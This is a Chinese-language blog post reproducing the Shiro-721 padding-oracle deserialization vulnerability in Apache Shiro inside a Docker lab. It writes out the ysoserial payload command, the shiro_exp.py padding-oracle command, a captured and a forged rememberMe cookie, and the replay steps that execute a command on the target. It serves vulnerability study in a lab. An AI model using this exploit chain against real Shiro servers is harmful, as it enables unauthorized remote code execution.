shiro-721漏洞复现

最新推荐文章于 2024-04-20 23:59:16 发布
最新推荐文章于 2024-04-20 23:59:16 发布
阅读量710 收藏 1
点赞数 2
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53409748/article/details/129808383
版权

简介

        Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题,用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。

影响版本:Apache Shiro <= 1.4.1


环境搭建

docker pull vulfocus/shiro-721

docker run -d -p 8182:8080 vulfocus/shiro-721(这里映射在了8182端口上)

漏洞复现

访问192.168.121.131:8182

 点击登录,抓包:

 

登录 Shiro 测试账户获取 Cookie:

        输入错误的用户名和密码,http响应页面中会显示出deleteMe的cookie:

使用正确的用户名和密码登录,不会显示deleteMe的cookie

 使用正确的用户名密码登录,勾选RememberMe,进行抓包,放行登录请求包,

记录remember值:

aW/7+bN9rbNWTnQC44ijeOZlfN2SwBUay7+SGN8/5Zi6hVuPB+gy5ahBMRW9LthNlrDls65T4GDzed9PpHxZMNGL6ft+0x7kN2byR7VR1bKut+hM/010DHT6GBmqV4wI+e/viE2BbW1oLTR7Lfs85IUhBlRD4W9TlK3f2BvrVPZp5OU5bXAhi3ixpqOotDVKIPnE4W2/4BxG8oA+qEluufpfWploFIN6pUj/yG0AESDipKtBKScBLwbhdYWDQAUiOFwoWgUMNZnDRPiZLB0Ije/uPf+mTBobns7EJUrs5gUp6tTuqeWFL74h0FjXq+H2VlBjS/+KcfZ7x1Kjk6MsFPVdOKLA/k8gx3RuQI9pq3u0lgsEg/Bp40T8+jUulvwEaxVeZiLAlwd2BDsozxjyiB0keO0vQsBaEmnX+5rT0EAlIjPDC7J+hylv7ds+3EYf/gjKa+0zqxUHNIWYn/45gSKWmw2aiCsNl8I0d8rB5lHJeEhSd4zBVNkKSqcXsm0n

 使用Java反序列化工具 ysoserial 生成 Payload: 这里可以生成在目标靶机根目录中创建test的payload

java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 "touch /usr/local/tomcat/test" > payload.class

http://ysoserial-master-2874a69f61-1.jar下载链接

 通过 Padding Oracle Attack生成 Evil Rememberme cookie:

shiro_rce_exp下载链接

下载后解压

cp payload.class  shiro_rce_exp-master
cd shiro_rce_exp-master 
python2 shiro_exp.py http://IP/account/  之前获取的RememberMe值   payload.class

这里使用python2启动

接下来就是漫长的等待 

此 exp 爆破时间较长,建议使用 ysoserial 生成较短的 payload 验证(如: ping 、 touch /tmp/test等),约 30多分钟可生成正确的 rememberme cookie,生成成功后将自动停止运行。

这里大概等了三十分钟

 

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

使用Evil Rememberme cookie 认证进行反序列化攻击:复制该cookie,然后重放一下数据,即可成功执行命令

将之前获取的rememberMe更改为刚才爆破出的结果,并放行

 

检查一下执行结果,可以看到成功创建了一个test文件

 

 

²⁰⁰²₀₂.₀₁T̶B̶
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shiro反序列化原理及完整复现流程(Shiro-550/Shiro-721
Continuejww的博客
09-27 754
Apache Shiro是一个强大且易用的**Java安全框架,**能够用于身份验证、授权、加密和会话管理。Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,然后制作精心制作的RememberMe来执行Java反序列化攻击,例如SHIRO-550。 0x01重现此问题的步骤: 登录网站,并从cookie中获取RememberMe。 使用RememberMe cookie作为填充Oracle Attack的前缀。 加密ysoserial的序列化有效负载,以通过填充Oracle Attack制作精心制作的RememberMe。 请求带有新的RememberMe cookie的网站,以执行反序列化攻击。 攻击者无需知道RememberMe加密的密码密钥。
shiro721复现
weixin_50464560的博客
04-07 4161
转载至 shiro721复现 - qianxinggz - 博客园 (cnblogs.com) shiro721复现 目录 前言 一、环境搭建和知识储备 1.1、影响版本 1.2、Docker搭建环境 1.3、漏洞原理 二、复现过程 1、整体思路 2、具体流程 三、工具利用 使用ShiroExploit.jar 前言# 花费了2/3day的时间复现和了解这个漏洞,其挖掘的思路涉及到的密码学知识挺有意思的,叫做Padding Oracle Attack,..
Shiro历史漏洞复现 - Shiro-721
HAKUNAMATATATTA的博客
01-04 1938
由于 Apache Shiro cookie 中通过 AES-128-CBC 模式加密的 rememberMe 字段存 在问题,用户可通过 Padding Oracle 加密生成的攻击代码来构造恶意的 rememberMe 字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行。由于漏洞利用需要一个合法的登录账号,这里利用账号正常登陆获取一个有效的rememberMe cookie ,并记录下这个rememberMe的值。爆破成功,返回了rememberMe cookies的值。
【网络安全---漏洞复现shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程)
m0_67844671的博客
09-25 3132
shiro721反序列化漏洞(CVE-2019-12422)原理与漏洞复现和利用(保姆级的详细教程);详细还原了漏洞漏洞利用方式;Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
shiro反序列化复现.zip
08-03
2. **测试环境**:可能包含一个预配置的服务器环境,模拟了存在反序列化漏洞Shiro应用,使得用户可以在可控的环境中测试漏洞复现过程。 3. **文档**:解释了如何使用提供的工具和代码,以及漏洞的工作原理和修复...
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
然而,如标题和描述中提到的,存在一个名为CVE-2020-1957的安全漏洞,允许攻击者绕过Shiro的权限检查,从而访问受保护的资源。 该漏洞主要发生在Shiro 1.5.1及更早版本中,当用户请求的URL(URL1)通过Shiro的权限...
Shiro_721_Padding_Oracle_RCE:Shiro_721 exp 纯手工实现Padding Oracle整个过程
04-24
Shiro-721 Padding Oracle RCE Exp 免责声明:本工具仅供安全测试学习用途,禁止非法使用 纯手工实现Padding Oracle过程, 没有利用python-paddingoracle的api,可用于学习padding oracle细节。 默认采用jrmp gadget, 可以在脚本中自行更换,但是不建议,除非目标环境需要,因为padding oracle的耗时依赖于待加密payload的长度,jrmp长度相对较短。 测试环境:官方demo就可以了。 参考链接: Usage: python3 shiro_oracle_padding.py <target> <regular>
ShiroExploit-Deprecated:Shiro550Shiro721一键化利用工具,支持多种回显方式
03-21
2019.11.9更新: 由于当初作者开发时能力有限,导致工具本身存在着重重和问题矛盾等多重矛盾。目前有很多其他的优秀工具提供了对shiro检测/利用更好的支持(如更好的回显支持,更有效的小工具与直接支持内存外壳等),此工具当前已相形见绌。请各位移步其他更优秀的项目,感谢各位的使用。 2019.9.20更新: 对回显方式进行了一次更新,希望现在能好用一点 2020.9.12更新: 很多回显方式在本地测试OK,但是在实际环境中却不行,这个问题我不知道该怎么解决,希望有师傅可以指导下或者一起讨论下。 ShiroExploit 支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持多种回显方式 使用说明 初步:按要求输入要检测的目标URL和选择突破类型 Shiro550提供rememberMe Cookie, Shiro721需要提供一个有
Shiroexploit:Shiro命令执行工具
03-31
雷石安全实验室出品 Shiro命令执行工具V2.0 内置shiro 117个键 支持dnslog(ceye.io)查询检测,增加准确性 / *支持攻击利用。支持密钥与小工具自定义* / Shiro命令执行工具 V1.0提供默认的键的查询 摘取xray高级版xray利用链 100+个键已注释!!!!
shiro-721反序列化漏洞复现
weixin_63960760的博客
08-22 1047
密码分组链接模式(Cipher Block Chaining,CBC),其中“分组"是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。"链接”是指密文分组像链条一样相互连接在一起。
Shiro-721反序列化漏洞复现总结
weixin_44283446的博客
04-20 5471
Shiro-721反序列化漏洞复现漏洞利用复现总结前言Shiro-721反序列化漏洞原理影响版本环境搭建环境说明搭建复现 前言     Apache Shiro的一些版本上存在一些高危代码执行漏洞,Apache Shiro提供的RememberMe字段,Shiro-550和Shiro-721(Apache Shiro Padding Oracle Attack)是常见的Shiro反序列化漏洞Shiro-550的复现可以查看上一篇blog:https://blog
Shiro721漏洞复现(自动化工具使用&&详细教程)
m0_52701599的博客
03-26 1632
Shiro721漏洞复现(自动化工具使用&&详细教程)
Shiro-721反序列化漏洞
一醉一休的博客
10-19 5846
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序,用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞Shiro的反序列化漏洞Shiro-550与Shiro-721
shiro 历史漏洞复现
最新发布
m0_66490812的博客
04-20 221
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。shiro-721 代码执行。
shiro-550和shiro-721漏洞的异同点
06-06
Shiro-550和Shiro-721漏洞都是Apache Shiro框架的安全漏洞,但它们的漏洞类型和漏洞影响不同。 Shiro-550漏洞是Apache Shiro框架中的一种远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据包,触发远程代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值